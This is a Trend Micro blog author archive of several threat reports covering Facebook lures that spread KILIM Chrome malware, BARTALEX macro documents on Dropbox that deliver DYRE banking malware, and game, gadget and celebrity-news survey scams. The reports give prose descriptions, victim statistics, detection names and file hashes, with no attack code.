Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Mobile Vulnerabilities

  • Zero-Day Alerts

  • Recent Posts

  • Calendar

    September 2015
    S M T W T F S
    « Aug    
  • Email Subscription

  • About Us

    Author Archive - Christopher Talampas (Fraud Analyst)

    Just how effective is it for cybercriminals to keep using Google Chrome and Facebook to infect their victims with malware?

    We’ve already seen both platforms be used as parts of malicious social engineering schemes. Both Google and Facebook are aware of this and have taken steps to protect their users. The number of times malicious Chrome extensions have sprouted, for example, has driven Google to restrict the use of any extension not available on the Chrome Web Store.

    Unfortunately, initiatives like these have not deterred cybercriminal efforts. Our findings also show that many of these platforms users still get tricked.

    Just recently, I received a message from a Facebook friend that piqued our curiosity. The message was rather short and to the point:

    Figure 1. Message on Facebook

    Clicking the link led us to a site with a page designed to mimic the look and feel of Facebook. The page even pretends to have content from YouTube. Visiting the malicious site led to the automatic download of a file titled Chrome_Video_installer.scr.  The filename used makes it seem that it’s a harmless Chrome browser plugin required to play videos.

    Figure 2. Malicious page with the Facebook design

    This supposed video installer file is detected as TROJ_KILIM.EFLD. This variant attempts to download another file—possibly the final payload—but the site is currently down. However, it should be noted that KILIM malware are known to be malicious Chrome extensions and plugins.  KILIM variants have also been observed to spam Facebook messages and cause system infection.

    Prominent victims

    Using feedback we gathered from the Smart Protection Network™, we decided to see which countries were the most affected by this particular attack.

    We checked the landing page and found out that the Philippines had the most number of users who visited the site, followed by those from Indonesia, India, Brazil, and the U.S. What’s striking is the fact that these countries are the same ones reported to have the highest percentage in terms of Facebook penetration.

    Country Percentage
    Philippines 36%
    Indonesia 6%
    India 6%
    Brazil 6%
    US 5%
    Australia 3%
    Taiwan 3%
    Japan 3%
    Thailand 2%
    Qatar 2%

    Table 1. Countries with the most visits to the malicious site

    Facebook still remains the top social networking site in the world. Data from their company information page reveals that Facebook has 1.44 billion monthly and 1.25 billion mobile monthly active in March 2015. A sizeable percentage (around 83%) of users who are active on the site daily are from outside Canada and the U.S. This popularity obviously doesn’t come without pitfalls.

    The compelling elements

    In this attack, users might be fooled into clicking the link because of three things. First, the message comes from a Facebook friend, not a stranger. The message also addresses the user through the name he uses on Facebook. This makes it appear less like a random, spammed message. The informality of the message may compel the user to read the message.

    The use of the shortened link also helps disguise the lure. Compared to a more innocent-looking shortened link, a suspicious-looking URL might cause a user to reconsider clicking.

    The filename of the malware can also put the intended victim at ease. Extensions and plugins are part of the Chrome browser ecosystem. Meanwhile, a simple online search can inform the user that the .SCR file extension is often used for screensavers—not necessarily something they would immediately think as malicious.

    Facing Facebook threats

    Given the popularity of Facebook, members of the site must be discerning when it comes to dealing with the content they come across with. Never click links from unknown or unverified sites, especially if the content sounds too interesting to be true. Cybercriminals often use shocking or eye-catching content to convince users to visit malicious websites. It’s far better to click links that lead to a reputable source than some random blog or site. The Trend Micro Site Safety Center can also be used to check if websites are safe or not.

    The same can be said for links or attachments sent by friends. It’s worth the effort to first confirm the message before clicking the link or opening the attachment.

    Facebook safety doesn’t begin and end with safety measures for the website. Other precautions like screening emails and installing a security solution can prevent malware from infecting your computers and accessing your Facebook accounts.

    We have reported this incident to Facebook. As of this publishing, Facebook has marked the message as spam.

    With additional insight from Jed Valderama.

    Hashes for related file:

    • ed263d766342df6cb87c4405441f2f547557ffd2

    Update as of June 26, 2015, 12:50 P.M. PDT (UTC-7)

    A new scam has been spotted using Facebook to spread malicious Chrome extensions. Like the previously reported threat, this new one also send a Facebook message with a link to a friend then redirects to a malicious site that hosts an adult video and suggests to download a Chrome extension.

    Should the user install the code, Google Chrome will inform him that the extension has the capability of performing the following routines:

    • Read and change all your data on the websites you visited
    • Capture content of your screen
    • Communicate with cooperating websites

    Further analysis of the extension reveals that its code has routines related to Facebook accounts. For example, it can get the user’s Facebook profile ID, create Facebook notes, send messages, and even “harvest” the user’s contact list.

    This extension even uses the name of a legitimate business, Antelma Business Solutions, to further convince users to install the extension. But the discrepancy is jarring, considering that the extensions is supposed to be for managing web conferences—nothing remotely related to adult videos.

    As of this writing, we have reported this extension, detected as BREX_KILIM.VVOX, to Google. We spotted another extension in the app store exhibiting the same name and routines but it is no longer available on Google Web Store.

    Hashes for related file:

    • F401C0ED399D79C07EC06C97BBD82E774823C6FE
    Posted in Malware, Social | Comments Off on Chrome Lure Used in Facebook Attack despite Google’s New Policy

    Enterprises are currently being targeted by the macro malware BARTALEX in a recent outbreak of thousands of spammed emails. The infection routine for BARTALEX uses a Microsoft Word document and social engineering lure that is widely recognized by enterprises—making infection all too possible. This attack highlights how macro malware in Microsoft Office files is fast becoming a big threat to businesses and organizations.

    BARTALEX Infection Chain

    In this attack, a colleague of mine noticed an outbreak of spammed messages all related to Automated Clearing House (ACH) fraud. ACH is a network used for electronic fund transfers in the United States; as a result it is frequently used by businesses that need to transact with other companies on a regular basis.

    ACH fraud is a typical cybercriminal hook seen in spammed emails. Instead of attachments,  the message this time bore a link to “view the full details.” Other templates used for these spammed emails involve messages about received fax messages, parcels, invoice and billing statements, and wire transfers.

    Figure 1. Sample spammed email that leads to W2KM_BARTALEX.SMA

    By hovering over the URL we can see that it redirects to a Dropbox link with a file name related to the supposed ACH transaction. The URL leads to a Dropbox page that contains specific instructions (and an almost convincing) Microsoft Office warning that instructs users to enable the macros.

    This malicious document is detected as W2KM_BARTALEX.SMA. As of this writing, more than a thousand similar Dropbox links were found with the same routines.

    Figure 2. A Dropbox page contains the malicious macro (click to enlarge)

    Upon enabling the macro, the malicious document then triggers the download of the banking malware TSPY_DYRE.YUYCC. This DYRE variant targets banks and financial institutions in the United States, among which are JP Morgan, U.S. Bank, California Bank & Trust, Texas Capital Bank, etc.

    Based on feedback from the Smart Protection Network, the United States is the top country affected by BARTALEX malware overall, followed by Canada and Australia. Additionally we noticed that this attack used an old Microsoft Office 2010 logo. Given that many enterprises do not immediately upgrade to the latest Office versions, it is possible that users within enterprise organizations may fall victim to this technique.

    Figure 3. W2KM_BARTALEX infection count over the last three months

    Malware Improvements

    This latest observation is but another development for both BARTALEX and DYRE. We previously reported on BARTALEX malware that were attached to spammed emails.

    In January this year, we wrote about improved DYRE infection techniques. These techniques involve hijacking Microsoft Outlook to spread UPATRE, which inevitably download data stealing malware ZeuS and ransomware.

    Dropbox not new to malicious activity

    This isn’t the first time that Dropbox was reported to have been involved in malicious activity. Dropbox and other cloud-based services are known to host malware and cybercriminals’ C&C software, but this is the first time we’re seeing Dropbox used to host macro-based malware, which is rapidly increasing despite its being a thing of the past.

    We have already contacted Dropbox about the more than a thousand links hosted on their site.

    Macro malware still in the picture

    Macro malware like BARTALEX is seemingly more prominent than ever, which is an indicator that old threats are still effective infection vectors on systems today. And they seem to be adapting: they are now being hosted in legitimate services like Dropbox, and with the recent outbreak, macro malware may continue to threaten more businesses in the future.

    Addressing macro malware in an enterprise (and small and medium-sized business) setting involves reevaluating and revisiting existing security policies. It’s also advisable to decrease the attack surface area by making sure systems within the corporation have the necessary security measures in place: for instance, it may be wise to disable Windows Scripting Host on users’ systems if it serves no substantial purpose. Lastly, user education will go a long way in defending against these types of threats, in particular, those that exploit human error, e.g., enabling malicious macros in Word documents.

    The hashes of the files detected as W2KM_BARTALEX.SMA are:

    • 61a7cc6ed45657fa1330e922aea33254b189ef61
    • 6f252485dee0b854f72cc8b64601f6f19d01c02c
    • 85e10382b06801770a4477505ed5d8c75fb37135

    The hash of the files detected as TSPY_DYRE.YUYCC is:

    • 5e392950fa295a98219e1fc9cce7a7048792845e

    The hashes of the malicious Microsoft Office documents are:

    • 037cebf49a412bcabd7d3b896382af53eaecabed
    • 0b4100e124507a174f147c3bf0121769ab209104
    • 0fad05ba34d91de15047052c4a6166d92aa5e3ac
    • 1363b79fc25467ea01842c5cbfa90c90bd7e7790
    • 164929155ab6f78a3ff46753b0a321e8dbd13e8a
    • 18df8417fce6f9e24c8369a2897eaf29b1ec11c4
    • 21bc3485810e258b425e4b38e46d944f7be81c50
    • 23f9777f17f86c9c8cbf25672e2e783ab0acc58c
    • 25cbbcc94782b2f1efd46179f28c517af44637fb
    • 29e4f4013c07dfcb0aae20c806b157ed7f023e9c
    • 2b01eb798d31d91cc03221b82c3f3fe04f4eb40a
    • 2b8c9af6d0c372f3343ae76e26d48f8c9eed37c7
    • 31dcc204661eee13920fda7ec582aaa1ec48f821
    • 31e2a2152a974f69e98c235c0dd3cddc1984b8da
    • 3338db3553bc2ef8b7587f5b331c2a3ecbbbcd6c
    • 339543194c2e64c27d746572d235dba37a332eeb
    • 33c73dfd66f9fb0e8bc30b53b150e202e7fc3055
    • 350a922a008078c6fdbee9f566363f553ea55394
    • 3916a8150fa10d4b4999f6bd97b7e7464bea13d1
    • 3cdde0489afab5c5fd9098c408c7419b44d2bc46

    Additional analysis by Cris Pantanilla, Francis Antazo, Jay Yaneza, and Maydalene Salvador

    Update as of May 1, 2015, 11:00 PM (GMT+8)
    The list above has been modified to indicate the hashes of the malicious Microsoft Office documents instead of HTML files as previously listed.


    While gamers from North America and Europe are still waiting for the release of Diablo III this coming Tuesday (May 15), cybercriminals have already gone ahead and started taking advantage.

    We found a search result for the string “diablo 3 free download” leading to a survey scam — a scheme frequently seen deployed through Facebook.

    The search result below (highlighted in yellow) directs to the a page which appears to be the download page for Diablo III:

    However, clicking the download button only leads to the following survey page:

    Another result, one supposedly leading to a YouTube page (highlighted in red in Figure 1), leads to the following page:

    Entering the site, the visitor is met with instructions that they need to follow in order to be able to download the beta version of Diablo III. Interestingly, the steps involve sharing a link through Facebook three times — once on the users’ wall and twice on game pages.

    Of course, following the instructions do not really lead to a file download, instead only directing to yet another survey page:

    As enticing as it is to be able to download a very popular game right before everyone else does, users should keep in mind that such shady offers are widely used as bait by cybercriminals.

    Diablo 3 is not the first game used by cybercriminals for schemes, we’ve seen other popular games such as World of Warcraft and Grand Theft Auto being used in the past.

    Trend Micro users are protected from the schemes reported above through the Trend Micro™ Smart Network Protection™.


    Scammers have snatched up the opportunity to victimize people by leveraging the interest and anticipation over the upcoming release of iPad 3. Just days before its supposed launch, we have noted several posts on Facebook that claim to give away free iPad 3s to some “lucky” users.

    Unlike previous Facebook threats we’ve blogged recently, this one does not involve clickjacking. Some users may have intentionally post this link on their social media accounts like Facebook to increases their points as a referrer and increase their chances of “winning” these items. Once users visit the site and click the image it will load the following page:

    Read the rest of this entry »


    News of Whitney Houston’s sudden demise spread like wildfire in the Internet. Countless tweets, Facebook wall posts, and news items circulated regarding the singer’s death at age 48. Given the massive attention around Houston’s death, cybercriminals were quick in taking advantage of this unfortunate incident.

    We have uncovered two web threats shortly after the news broke. One was a clickjacking attack found on Facebook, while the other one was a link circulating on Twitter.

    RIP “Whitney Houston” leads to Clickjacking

    My colleague  Karla Agregado found a fake video spreading on Facebook. Wall posts with the subject “I Cried watching this video. RIP Whitney Houston” come with link to the supposed video. Clicking it leads them to a Facebook page that contains a link to the video. However, clicking this link only leads to several redirections until users are lead to the usual survey scam site.

    Upon further investigation on the domains involved in the redirections, we also found 101 more survey scams registered on the same IP where the domains are hosted.

    RIP Whitney Tweets May Lead To Web Threat

    We also found Tweets with malicious links that also took advantage of the tag RIP Whitney Houston, which was trending worldwide on Twitter.

    The said Tweets contain a link to a particular blog dedicated to the late singer. Users who view the page are automatically redirected to another website. The succeeding page is a site that supposedly features several Whitney Houston wallpapers. Once users decide to download a wallpaper from that site, a pop-up window appears and asks users to download some Whitney Houston ringtones.

    Read the rest of this entry »



    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice